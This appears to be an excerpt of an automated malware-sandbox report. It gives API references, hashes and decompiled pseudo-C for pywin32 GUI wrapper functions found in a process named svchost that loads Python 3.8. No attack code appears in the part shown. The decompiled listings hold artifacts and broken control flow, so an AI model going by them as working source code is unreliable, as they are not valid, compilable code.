                            Similarity
                            • API ID: DeallocLong_State_$BuildCallEnsureErr_Eval_FromKeywordsLongObjectOccurredReleaseU_object@@ValueWith
                            • String ID: (NO)
                            • API String ID: 3912475454-194327457
                            • Opcode ID: d8bbdf8305b390948e5654205ec9e03c8f77a485555530453dcb84f18592efa5
                            • Instruction ID: e2ccfe4b15a92dff3cd1cc59c010d5148e8ce8cc908e1d4cffb6f3dc041ea4d0
                            • Opcode Fuzzy Hash: d8bbdf8305b390948e5654205ec9e03c8f77a485555530453dcb84f18592efa5
                            • Instruction Fuzzy Hash: B121B075C082069FDB005F68CC8976ABBB8FB06331F184335EC26932A0D7755D638AA2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,OOi:GetUpdateRgn,00000000,?), ref: 6DAB5DCA
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAB5DEB
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAB5DFD
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Object_U_object@@$Arg_ParseTuple
                            • String ID: GetUpdateRgn$OOi:GetUpdateRgn
                            • API String ID: 1248562531-2548639082
                            • Opcode ID: b81f3914d36704e0bdea8af9805e9471f97c243b86a4b1153fdcbf98cb5aba1c
                            • Instruction ID: 16d45d5b44b63412da20775475a63e1792142ed64c12b5a79bfde39ddc0cb197
                            • Opcode Fuzzy Hash: b81f3914d36704e0bdea8af9805e9471f97c243b86a4b1153fdcbf98cb5aba1c
                            • Instruction Fuzzy Hash: 54119375408302AFDB01DB18DC45BAB3BBDBF84215F888939FC85C1131F331D56A8AA2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,6DABDE58,?,?), ref: 6DAA75E6
                            • PyCallable_Check.PYTHON38 ref: 6DAA75F6
                            • PyErr_SetString.PYTHON38(6E28ED8C,First param must be a callable object), ref: 6DAA760F
                            • PyEval_SaveThread.PYTHON38 ref: 6DAA762F
                            • EnumWindows.USER32(Function_000074F0,?), ref: 6DAA7641
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DAA764A
                            • PyErr_Occurred.PYTHON38 ref: 6DAA7659
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(EnumWindows,00000000), ref: 6DAA7669
                            Strings
                            • First param must be a callable object, xrefs: 6DAA7608
                            • EnumWindows, xrefs: 6DAA7664
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Err_Eval_Thread$Arg_Callable_CheckEnumError@@OccurredParseRestoreSaveStringTupleU_object@@Win_Windows
                            • String ID: EnumWindows$First param must be a callable object
                            • API String ID: 88214000-2284451218
                            • Opcode ID: 5e654e07c0436561106657b33f0f5223ed7f50d74184a0d707adec1f78752c35
                            • Instruction ID: 22add96ac7bb2298ec65701da42f28904e368854af9b60f477f0d25105b9b743
                            • Opcode Fuzzy Hash: 5e654e07c0436561106657b33f0f5223ed7f50d74184a0d707adec1f78752c35
                            • Instruction Fuzzy Hash: 1311427590C3059FDB00AF69CC88A2A77F9FF55205F488A65F945C3222E730D917CBA2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 30%
                            			E6DAB10C0(intOrPtr _a8) {
                            				struct HDC__* _v4;
                            				int _v8;
                            				int _v12;
                            				long _v16;
                            				long* _t12;
                            				struct HDC__** _t13;
                            				struct HBITMAP__* _t15;
                            				long _t17;
                            				void* _t18;
                            				void* _t19;
                            				void* _t23;
                            
                            				_v16 = 0;
                            				_t12 =  &_v16;
                            				__imp__PyArg_ParseTuple(_a8, "Oii:CreateCompatibleBitmap", _t12,  &_v8,  &_v12);
                            				if(_t12 != 0) {
                            					_t13 =  &_v4;
                            					__imp__?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z(_v16, _t13);
                            					if(_t13 == 0) {
                            						goto L1;
                            					} else {
                            						__imp__PyEval_SaveThread(_t19, _t23);
                            						SetLastError(0);
                            						_t15 = CreateCompatibleBitmap(_v4, _v8, _v12);
                            						_t20 = _t15;
                            						__imp__PyEval_RestoreThread(_t13);
                            						if(_t15 != 0) {
                            							L6:
                            							return E6DAA5630(_t18, _t20);
                            						} else {
                            							_t17 = GetLastError();
                            							if(_t17 == 0) {
                            								goto L6;
                            							} else {
                            								__imp__?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z("CreateCompatibleBitmap", _t17);
                            								return _t17;
                            							}
                            						}
                            					}
                            				} else {
                            					L1:
                            					return 0;
                            				}
                            			}

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,Oii:CreateCompatibleBitmap,?,?,?), ref: 6DAB10E2
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAB10FE
                            • PyEval_SaveThread.PYTHON38 ref: 6DAB110D
                            • SetLastError.KERNEL32(00000000), ref: 6DAB1117
                            • CreateCompatibleBitmap.GDI32(?,?,?), ref: 6DAB1129
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DAB1132
                            • GetLastError.KERNEL32 ref: 6DAB113F
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(CreateCompatibleBitmap,00000000), ref: 6DAB114F
                            Strings
                            • CreateCompatibleBitmap, xrefs: 6DAB114A
                            • Oii:CreateCompatibleBitmap, xrefs: 6DAB10D9
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: ErrorEval_LastThreadU_object@@$Arg_BitmapCompatibleCreateError@@Object_ParseRestoreSaveTupleWin_
                            • String ID: CreateCompatibleBitmap$Oii:CreateCompatibleBitmap
                            • API String ID: 3808850150-1912056031
                            • Opcode ID: be256af2d13c6025603100efd03d13c7d8535c81cc031f4bc9487d9e75b82e11
                            • Instruction ID: 83d53ade5720f2968066441ee0bb811ec4f194631688fbf5ec09185e50889aa9
                            • Opcode Fuzzy Hash: be256af2d13c6025603100efd03d13c7d8535c81cc031f4bc9487d9e75b82e11
                            • Instruction Fuzzy Hash: 4011C27650C201AFDB00AB68DC49BBB7BBCFF85215F488968F955C1121E731C56B8BA3
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 21%
                            			E6DAAF1C0(intOrPtr _a8) {
                            				int _v4;
                            				int _v8;
                            				int _v12;
                            				int _v16;
                            				int _v20;
                            				int* _t15;
                            				long _t16;
                            				void* _t17;
                            				long _t18;
                            				void* _t21;
                            
                            				_t15 =  &_v4;
                            				__imp__PyArg_ParseTuple(_a8, "iiiii:ImageList_Create", _t15,  &_v8,  &_v12,  &_v16,  &_v20);
                            				if(_t15 != 0) {
                            					__imp__PyEval_SaveThread(_t17, _t21);
                            					SetLastError(0);
                            					_t16 = ImageList_Create(_v4, _v8, _v12, _v16, _v20);
                            					_t18 = _t16;
                            					__imp__PyEval_RestoreThread(_t15);
                            					if(_t18 != 0) {
                            						L5:
                            						__imp__?PyWinLong_FromHANDLE@@YAPAU_object@@PAX@Z(_t18);
                            						return _t16;
                            					} else {
                            						_t16 = GetLastError();
                            						if(_t16 == 0) {
                            							goto L5;
                            						} else {
                            							__imp__?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z("ImageList_Create", _t16);
                            							return _t16;
                            						}
                            					}
                            				} else {
                            					return _t15;
                            				}
                            			}

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,iiiii:ImageList_Create,?,?,?,?), ref: 6DAAF1E4
                            • PyEval_SaveThread.PYTHON38 ref: 6DAAF1F7
                            • SetLastError.KERNEL32(00000000), ref: 6DAAF201
                            • ImageList_Create.COMCTL32(?,?,?,?,?), ref: 6DAAF21B
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DAAF224
                            • GetLastError.KERNEL32 ref: 6DAAF231
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(ImageList_Create,00000000), ref: 6DAAF241
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: ErrorEval_LastThread$Arg_CreateError@@ImageList_ParseRestoreSaveTupleU_object@@Win_
                            • String ID: ImageList_Create$iiiii:ImageList_Create
                            • API String ID: 922996389-44447952
                            • Opcode ID: 8b6fb5b631ac3a90f20f917a84cf78ea471fd62ede8db8321b71b8e5f6725c75
                            • Instruction ID: eb046b7729252a20a9a112d54129394b38c1e5c625690c8b7dcba5ae50c7f313
                            • Opcode Fuzzy Hash: 8b6fb5b631ac3a90f20f917a84cf78ea471fd62ede8db8321b71b8e5f6725c75
                            • Instruction Fuzzy Hash: 55018676408201AFCB01AF58CC48AAB3BBDFF85241F48466DF555C1031E735C15A9BA3
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PySequence_Tuple.PYTHON38(?), ref: 6DAA516B
                            • PyArg_ParseTuple.PYTHON38(00000000,OOH|(hhhh)kkO:DLGITEMTEMPLATE,?,?,?,?,?,?,?,?,?,?), ref: 6DAA51B8
                            • ?PyWinObject_AsResourceIdW@@YAHPAU_object@@PAPA_WH@Z.PYWINTYPES38(?,?,00000000), ref: 6DAA51D4
                            • ?PyWinObject_AsWCHAR@@YAHPAU_object@@PAPA_WHPAK@Z.PYWINTYPES38(?,?,00000001,00000000), ref: 6DAA51EE
                            • ?PyWinObject_AsReadBuffer@@YAHPAU_object@@PAPAXPAKH@Z.PYWINTYPES38(?,?,?,00000001), ref: 6DAA520B
                            • ?PyWinObject_FreeResourceId@@YAXPA_W@Z.PYWINTYPES38(?), ref: 6DAA5255
                            • ?PyWinObject_FreeWCHAR@@YAXPA_W@Z.PYWINTYPES38(?), ref: 6DAA525F
                            • _Py_Dealloc.PYTHON38(-000000FF), ref: 6DAA526E
                            Strings
                            • OOH|(hhhh)kkO:DLGITEMTEMPLATE, xrefs: 6DAA51B2
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Object_$U_object@@$FreeResourceTuple$Arg_Buffer@@DeallocId@@ParseReadSequence_
                            • String ID: OOH|(hhhh)kkO:DLGITEMTEMPLATE
                            • API String ID: 3797210680-3713364502
                            • Opcode ID: 71ca8ec640e883acc109953b3744dc0444645b96d0a89ad7822591cb5b727834
                            • Instruction ID: dad17c47f92904d90fa0d87992b2efec02b4b7e2d7c66007409b20ed6439e80e
                            • Opcode Fuzzy Hash: 71ca8ec640e883acc109953b3744dc0444645b96d0a89ad7822591cb5b727834
                            • Instruction Fuzzy Hash: CC412BB2408345AFD701CF65C884AAFB7FCFF89210F484A2EF699D2120E731D55A8B56
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 24%
                            			E6DAA80A0(intOrPtr _a8) {
                            				void* _v4;
                            				void* _t10;
                            				void** _t13;
                            				int _t14;
                            				signed int _t18;
                            				signed int _t19;
                            				void* _t21;
                            				intOrPtr _t23;
                            				void* _t25;
                            				intOrPtr _t26;
                            				intOrPtr* _t27;
                            				intOrPtr _t28;
                            				void* _t29;
                            				char* _t30;
                            				void* _t32;
                            				intOrPtr* _t33;
                            				void* _t38;
                            
                            				_t10 = _t32;
                            				__imp__PyArg_ParseTuple(_a8, "O:DeleteObject", _t10);
                            				_t33 = _t32 + 0xc;
                            				if(_t10 == 0) {
                            					L11:
                            					return 0;
                            				} else {
                            					_t23 =  *_t33;
                            					_t38 =  *((intOrPtr*)(_t23 + 4)) - __imp__?PyHANDLEType@@3U_typeobject@@A; // 0x6e98bc00
                            					if(_t38 != 0) {
                            						_t13 =  &_v4;
                            						__imp__?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z(_t23, _t13);
                            						if(_t13 == 0) {
                            							goto L11;
                            						} else {
                            							_t14 = DeleteObject(_v4);
                            							if(_t14 != 0) {
                            								goto L20;
                            							} else {
                            								__imp__?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z("DeleteObject", _t14);
                            								return _t14;
                            							}
                            						}
                            					} else {
                            						_t30 = "PyGdiHANDLE";
                            						_t18 =  *((intOrPtr*)( *((intOrPtr*)(_t23 - 4)) + 8))(_t29);
                            						asm("o16 nop [eax+eax]");
                            						while(1) {
                            							_t25 =  *_t18;
                            							if(_t25 !=  *_t30) {
                            								break;
                            							}
                            							if(_t25 == 0) {
                            								L7:
                            								_t19 = 0;
                            							} else {
                            								_t28 =  *((intOrPtr*)(_t18 + 1));
                            								if(_t28 != _t30[1]) {
                            									break;
                            								} else {
                            									_t18 = _t18 + 2;
                            									_t30 =  &(_t30[2]);
                            									if(_t28 != 0) {
                            										continue;
                            									} else {
                            										goto L7;
                            									}
                            								}
                            							}
                            							L9:
                            							if(_t19 == 0) {
                            								_t26 =  *_t33;
                            								if(_t26 == 0) {
                            									_t27 = 0;
                            								} else {
                            									_t27 = _t26 + 0xfffffffc;
                            								}
                            								_t21 =  *((intOrPtr*)( *_t27 + 4))();
                            								if(_t21 != 0) {
                            									L20:
                            									 *__imp___Py_NoneStruct =  *__imp___Py_NoneStruct + 1;
                            									return __imp___Py_NoneStruct;
                            								} else {
                            									return _t21;
                            								}
                            							} else {
                            								__imp__PyErr_SetString( *__imp__PyExc_TypeError, "DeleteObject requires a PyGdiHANDLE");
                            								goto L11;
                            							}
                            							goto L21;
                            						}
                            						asm("sbb eax, eax");
                            						_t19 = _t18 | 0x00000001;
                            						goto L9;
                            					}
                            				}
                            				L21:
                            			}


                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,O:DeleteObject), ref: 6DAA80B0
                            • PyErr_SetString.PYTHON38(6E28ED8C,DeleteObject requires a PyGdiHANDLE), ref: 6DAA8116
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAA8146
                            • DeleteObject.GDI32(?), ref: 6DAA8157
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(DeleteObject,00000000), ref: 6DAA8167
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: U_object@@$Arg_DeleteErr_Error@@ObjectObject_ParseStringTupleWin_
                            • String ID: DeleteObject$DeleteObject requires a PyGdiHANDLE$O:DeleteObject$PyGdiHANDLE
                            • API String ID: 634653252-1735475675
                            • Opcode ID: 436d2755733059f5db86e3c882af02310fffbe7f7e09ad1bb6cb445dbfdde1a2
                            • Instruction ID: 21813dbd99a7127671466d530b025be086ffca121ac819b103a7b07ae0b2cda3
                            • Opcode Fuzzy Hash: 436d2755733059f5db86e3c882af02310fffbe7f7e09ad1bb6cb445dbfdde1a2
                            • Instruction Fuzzy Hash: 6621B678A0C2819FCB009F38DC55A767BF5BF02205B4C8768E845C71A2E732C996C661
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,OOiiiii:SetWindowPos,?,?,?,?,?,?), ref: 6DAB15EE
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAB160F
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAB1621
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Object_U_object@@$Arg_ParseTuple
                            • String ID: OOiiiii:SetWindowPos$SetWindowPos
                            • API String ID: 1248562531-1125080933
                            • Opcode ID: 9a200d0c54f39d9dfb85a2683544d573e5846eba70e63dc9df68f9b7da16597e
                            • Instruction ID: 9f74d0950ee042d029fd269935dc0f0e8f79f514ee5e27987ccc33f8f5746790
                            • Opcode Fuzzy Hash: 9a200d0c54f39d9dfb85a2683544d573e5846eba70e63dc9df68f9b7da16597e
                            • Instruction Fuzzy Hash: 9D21327240C305AFCB019F54CC90EAB7BFDFF88244F484A29F98991121E731D59A9B92
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyArg_ParseTuple.PYTHON38(00000000,OOO:TranslateAccelerator,00000000,?,?), ref: 6DAB18F1
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(00000000,?), ref: 6DAB1916
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(00000000,?), ref: 6DAB1926
                            • ?PyWinObject_AsMSG@@YAHPAU_object@@PAUtagMSG@@@Z.PYWINTYPES38(?), ref: 6DAB193F
                            • PyEval_SaveThread.PYTHON38 ref: 6DAB194C
                            • TranslateAcceleratorW.USER32(?,?), ref: 6DAB195B
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DAB1964
                            • Py_BuildValue.PYTHON38(6DABFF68,00000000), ref: 6DAB1970
                            Strings
                            • OOO:TranslateAccelerator, xrefs: 6DAB18E9
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Object_U_object@@$Eval_Thread$AcceleratorArg_BuildG@@@ParseRestoreSaveTranslateTupleUtagValue
                            • String ID: OOO:TranslateAccelerator
                            • API String ID: 3680090832-1379186118
                            • Opcode ID: c714ff13a27a82a4fb6c572deb4ed5a1093459ee09207b4dea7897e4c599df34
                            • Instruction ID: dcc6dc7cea2c9e6c032869ae1c51e093ffb0d05812ccb988c3a9f0f9fb192e8c
                            • Opcode Fuzzy Hash: c714ff13a27a82a4fb6c572deb4ed5a1093459ee09207b4dea7897e4c599df34
                            • Instruction Fuzzy Hash: 13115C75D04209AFDF109BA5DC49BEFBBBCEF05215F044265EC14E2121E7319A66CAE1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,OOOi:SignalObjectAndWait,?,?,?), ref: 6DA92127
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DA92148
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DA9215A
                            • PyLong_AsUnsignedLongMask.PYTHON38(?), ref: 6DA92167
                            • PyErr_Occurred.PYTHON38 ref: 6DA92177
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481614905.000000006DA91000.00000020.00020000.sdmp, Offset: 6DA90000, based on PE: true
                            • Associated: 00000013.00000002.481607442.000000006DA90000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481622617.000000006DA94000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481629043.000000006DA96000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481635267.000000006DA98000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6da90000_svchost.jbxd
                            Similarity
                            • API ID: Object_U_object@@$Arg_Err_LongLong_MaskOccurredParseTupleUnsigned
                            • String ID: OOOi:SignalObjectAndWait$SignalObjectAndWait
                            • API String ID: 3610075487-2586135881
                            • Opcode ID: 4aad3cf55c5947ccfb6d292ebda7a2d13e79b6590e388cef4989fa3664d4252c
                            • Instruction ID: 91686b80b0ec85cc3a5eb22893c4e5b98c737b18d05452b5cebd61549eccffd9
                            • Opcode Fuzzy Hash: 4aad3cf55c5947ccfb6d292ebda7a2d13e79b6590e388cef4989fa3664d4252c
                            • Instruction Fuzzy Hash: CE11C07541C202AFDB10EF58DC40BABBBF8EF48214F94846AFCA885150F731D5698AD6
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,O(ii(ii)(ii)(iiii)):SetWindowPlacement,?,?,?,?,?,?,?,?,?,?,?), ref: 6DAA860B
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAA8627
                            • PyEval_SaveThread.PYTHON38 ref: 6DAA8636
                            • SetWindowPlacement.USER32(?,?), ref: 6DAA8647
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DAA8650
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(SetWindowPlacement,00000000), ref: 6DAA8666
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Eval_ThreadU_object@@$Arg_Error@@Object_ParsePlacementRestoreSaveTupleWin_Window
                            • String ID: ,$O(ii(ii)(ii)(iiii)):SetWindowPlacement$SetWindowPlacement
                            • API String ID: 2077839949-1347706296
                            • Opcode ID: 119fa4725a87d9974438a88d135a833e66b7b9442e7c16bcdd7a63534dad7fe9
                            • Instruction ID: 2b218cb36e08fa3a9c0417f227715b702d4456e2bceaf0381fd3ea334fd0882b
                            • Opcode Fuzzy Hash: 119fa4725a87d9974438a88d135a833e66b7b9442e7c16bcdd7a63534dad7fe9
                            • Instruction Fuzzy Hash: 831121B2418345AFD701DB54CD84EAB77FCBF84201F884A2AF956C2121E730D61A8BA6
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,OOii:CreateCaret,?,?,?), ref: 6DAB7D5F
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAB7D80
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAB7D92
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Object_U_object@@$Arg_ParseTuple
                            • String ID: CreateCaret$OOii:CreateCaret
                            • API String ID: 1248562531-3503100133
                            • Opcode ID: 61502564333a968dd07ba0024484b775123717705d33f5fb5f065f6bfcf589d4
                            • Instruction ID: bd833359877ddb09eae2f2160d6ecaab87173ff765817ea48842c8d6f4f32cbc
                            • Opcode Fuzzy Hash: 61502564333a968dd07ba0024484b775123717705d33f5fb5f065f6bfcf589d4
                            • Instruction Fuzzy Hash: 1411847680C305AFDB01AF18CC41BAB7BFCBF85255F884969F88581131E331D96A9BD2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,OiiO:DrawIcon,?,?,?), ref: 6DAAE8EF
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAAE910
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAAE922
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Object_U_object@@$Arg_ParseTuple
                            • String ID: DrawIcon$OiiO:DrawIcon
                            • API String ID: 1248562531-1311418177
                            • Opcode ID: 6d2d42dca3b3b1fb8123bef5bb2bc4992734e2c172c48772fff20745bf5a2aee
                            • Instruction ID: e511bfe0ae7473cdc47ed4e5480d46bd36f53c36cbbc94007aa5a155d28d0b1f
                            • Opcode Fuzzy Hash: 6d2d42dca3b3b1fb8123bef5bb2bc4992734e2c172c48772fff20745bf5a2aee
                            • Instruction Fuzzy Hash: 2911847640C305AFDB01AF18CC40BAB7BF8BF84215F884A59F885C2121E335D95A9BD2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,OiOO:ImageList_Replace,?,?,?), ref: 6DAAF8F7
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAAF918
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAAF92A
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAAF93C
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
